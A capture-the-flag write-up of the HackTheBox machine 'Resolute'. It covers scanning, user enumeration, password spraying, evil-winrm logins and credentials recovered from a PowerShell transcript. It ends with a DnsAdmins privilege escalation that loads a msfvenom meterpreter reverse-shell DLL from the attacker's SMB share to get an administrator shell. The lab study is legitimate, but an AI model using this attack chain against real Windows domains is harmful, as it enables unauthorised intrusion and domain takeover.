Let’s get started
As always hacking starts with NMAP scan.
resolute nmap -sC -sV -p- -v -oA scans/nmap-full -T4 resolute.htb
Starting Nmap 7.70 ( https://nmap.org ) at 2020-05-29 09:31 EDT
NSE: Loaded 148 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 09:31
Completed NSE at 09:31, 0.00s elapsed
Initiating NSE at 09:31
Completed NSE at 09:31, 0.00s elapsed
Initiating Ping Scan at 09:31
Scanning resolute.htb (10.10.10.169) [4 ports]
Completed Ping Scan at 09:31, 0.59s elapsed (1 total hosts)
Initiating SYN Stealth Scan at 09:31
Scanning resolute.htb (10.10.10.169) [65535 ports]
Discovered open port 445/tcp on 10.10.10.169
Discovered open port 139/tcp on 10.10.10.169
Discovered open port 135/tcp on 10.10.10.169
Discovered open port 53/tcp on 10.10.10.169
Discovered open port 49677/tcp on 10.10.10.169
NSE: Script scanning 10.10.10.169.
Initiating NSE at 09:52
Completed NSE at 09:54, 121.80s elapsed
Initiating NSE at 09:54
Completed NSE at 09:54, 1.93s elapsed
Nmap scan report for resolute.htb (10.10.10.169)
Host is up (0.36s latency).
Not shown: 65510 closed ports
PORT STATE SERVICE VERSION
53/tcp open domain?
| fingerprint-strings:
| DNSVersionBindReqTCP:
| version
|_ bind
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2020-05-29 04:29:54Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: megabank.local, Site: Default-First-Site-Name)
445/tcp open microsoft-ds Windows Server 2016 Standard 14393 microsoft-ds (workgroup: MEGABANK)
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: megabank.local, Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp open mc-nmf .NET Message Framing
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49670/tcp open msrpc Microsoft Windows RPC
49676/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49677/tcp open msrpc Microsoft Windows RPC
49684/tcp open msrpc Microsoft Windows RPC
49712/tcp open msrpc Microsoft Windows RPC
64798/tcp open tcpwrapped
64974/tcp open tcpwrapped
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port53-TCP:V=7.70%I=7%D=5/29%Time=5ED11327%P=x86_64-pc-linux-gnu%r(DNSV
SF:ersionBindReqTCP,20,"\0\x1e\0\x06\x81\x04\0\x01\0\0\0\0\0\0\x07version\
SF:x04bind\0\0\x10\0\x03");
Service Info: Host: RESOLUTE; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: -7h00m31s, deviation: 4h02m32s, median: -9h20m33s
| smb-os-discovery:
| OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3)
| Computer name: Resolute
| NetBIOS computer name: RESOLUTE\x00
| Domain name: megabank.local
| Forest name: megabank.local
| FQDN: Resolute.megabank.local
|_ System time: 2020-05-28T21:32:12-07:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: required
| smb2-security-mode:
| 2.02:
|_ Message signing enabled and required
| smb2-time:
| date: 2020-05-29 00:32:10
|_ start_date: 2020-05-28 18:33:16
NSE: Script Post-scanning.
Initiating NSE at 09:54
Completed NSE at 09:54, 0.00s elapsed
Initiating NSE at 09:54
Completed NSE at 09:54, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 1372.93 seconds
Raw packets sent: 72795 (3.203MB) | Rcvd: 69585 (2.784MB)
Using Enum4linux as the next step:
Enum4linux
Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Sat May 30 07:44:42 2020
==========================
| Target Information |
==========================
Target ........... resolute.htb
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none
====================================================
| Enumerating Workgroup/Domain on resolute.htb |
====================================================
[E] Cant find workgroup/domain
============================================
| Nbtstat Information for resolute.htb |
============================================
Unknown parameter encountered: "winbind trusted domains only"
Ignoring unknown parameter "winbind trusted domains only"
Looking up status of 10.10.10.169
No reply from 10.10.10.169
UserList
user:[Administrator] rid:[0x1f4]
user:[Guest] rid:[0x1f5]
user:[krbtgt] rid:[0x1f6]
user:[DefaultAccount] rid:[0x1f7]
user:[ryan] rid:[0x451]
user:[marko] rid:[0x457]
user:[sunita] rid:[0x19c9]
user:[abigail] rid:[0x19ca]
user:[marcus] rid:[0x19cb]
user:[sally] rid:[0x19cc]
user:[fred] rid:[0x19cd]
user:[angela] rid:[0x19ce]
user:[felicia] rid:[0x19cf]
user:[gustavo] rid:[0x19d0]
user:[ulf] rid:[0x19d1]
user:[stevie] rid:[0x19d2]
user:[claire] rid:[0x19d3]
user:[paulo] rid:[0x19d4]
user:[steve] rid:[0x19d5]
user:[annette] rid:[0x19d6]
user:[annika] rid:[0x19d7]
user:[per] rid:[0x19d8]
user:[claude] rid:[0x19d9]
user:[melanie] rid:[0x2775]
user:[zach] rid:[0x2776]
user:[simon] rid:[0x2777]
user:[naoki] rid:[0x2778]
something useful
=============================
| Users on resolute.htb |
=============================
index: 0x10a9 RID: 0x457 acb: 0x00000210 Account: marko
Name: Marko Novak
Desc: Account created. Password set to Welcome123!
Getting the User
So i used evil-winrm using user marko and pass Welcome123!
Which returned nothing…
So I treid the same password with all the users that I’ve found with the help of crackmapexe….
Which returned this
Username and password melanie:Welcome123!
Again with the help of EVIL-WINRM I was able to login and get the USER.txt….
evil-winrm -u melanie -p Welcome123! -i 10.10.10.169
Diggin in a little bit more deeper and searching for all the hidden files and directories, I found this..
cd /
dir -force
cd PSTranscripts
cd 20191203
cat PowerShell_transcript.RESOLUTE.OJuoBGhU.20191203063201.txt
This Powershell script will reveal the password of the other user on the domain,
ryan : Serv3r4Admin4cc123!
Immediately jumping into Evil-Winrm and using Ryan credentials, got the shell of Ryan.
evil-winrm -u ryan -p Serv3r4Admin4cc123! -i 10.10.10.169
Privlilege Escalation
Exploring the directories of ryan, found note.txt. Which says
“Email to team: - due to change freeze, any system changes (apart from those to the administrator account) will be automatically reverted within 1 minute”
Finding out the permissions of Ryan
C:\Users\ryan\Desktop> whoami /all
USER INFORMATION
----------------
User Name SID
============= ==============================================
megabank\ryan S-1-5-21-1392959593-3013219662-3596683436-1105
GROUP INFORMATION
-----------------
Group Name Type SID
========================================== ================ ==============================================
Everyone Well-known group S-1-1-0
BUILTIN\Users Alias S-1-5-32-545
BUILTIN\Pre-Windows 2000 Compatible Access Alias S-1-5-32-554
BUILTIN\Remote Management Users Alias S-1-5-32-580
NT AUTHORITY\NETWORK Well-known group S-1-5-2
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11
NT AUTHORITY\This Organization Well-known group S-1-5-15
MEGABANK\Contractors Group S-1-5-21-1392959593-3013219662-3596683436-1103
MEGABANK\DnsAdmins Alias S-1-5-21-1392959593-3013219662-3596683436-1101
NT AUTHORITY\NTLM Authentication Well-known group S-1-5-64-10
Mandatory Label\Medium Mandatory Level Label S-1-16-8192
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ============================== =======
SeMachineAccountPrivilege Add workstations to domain Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
USER CLAIMS INFORMATION
-----------------------
User claims unknown.
Kerberos support for Dynamic Access Control on this device has been disabled.
C:\Users\ryan\Desktop> whoami /all
USER INFORMATION
----------------
User Name SID
============= ==============================================
megabank\ryan S-1-5-21-1392959593-3013219662-3596683436-1105
GROUP INFORMATION
-----------------
Group Name Type SID
========================================== ================ ==============================================
Everyone Well-known group S-1-1-0
BUILTIN\Users Alias S-1-5-32-545
BUILTIN\Pre-Windows 2000 Compatible Access Alias S-1-5-32-554
BUILTIN\Remote Management Users Alias S-1-5-32-580
NT AUTHORITY\NETWORK Well-known group S-1-5-2
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11
NT AUTHORITY\This Organization Well-known group S-1-5-15
MEGABANK\Contractors Group S-1-5-21-1392959593-3013219662-3596683436-1103
MEGABANK\DnsAdmins Alias S-1-5-21-1392959593-3013219662-3596683436-1101
NT AUTHORITY\NTLM Authentication Well-known group S-1-5-64-10
Mandatory Label\Medium Mandatory Level Label S-1-16-8192
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ============================== =======
SeMachineAccountPrivilege Add workstations to domain Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
USER CLAIMS INFORMATION
-----------------------
User claims unknown.
Kerberos support for Dynamic Access Control on this device has been disabled.
Seeing that Ryan is a member of DNSAdmins of Megabank.local, we can escalate our privileges from DNS admin to administrator.
This is the link that helped me…
https://ired.team/offensive-security-experiments/active-directory-kerberos-abuse/from-dnsadmins-to-system-to-domain-compromise
Quickly generating a msfpayload and uploading the file.
msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=tun0 lport=3333 -f dll > plugin.dll
uploading the file using impacket script.
./smbserver.py -smb2support jeevan /home/stuxnet`
start the msfconsole and setup the listener.
> msfconsole
> use multi/handler
> set payload windows/x64/meterpreter/reverse_tcp
> set lhost tun0
> set lport 3333
> exploit
now the first command is to run the .dll file and the second and third commands are to stop and start the service respectively.
C:\Users\ryan\Desktop> dnscmd.exe /config /serverlevelplugindll \\10.10.14.47\jeevan\plugin.dll
sc.exe stop dns
sc.exe start dns
And we get the shell as administrator
If you like my work, please do consider giving me +rep on HACKTHEBOX.
My HackTheBox profile: https://www.hackthebox.eu/home/users/profile/291968
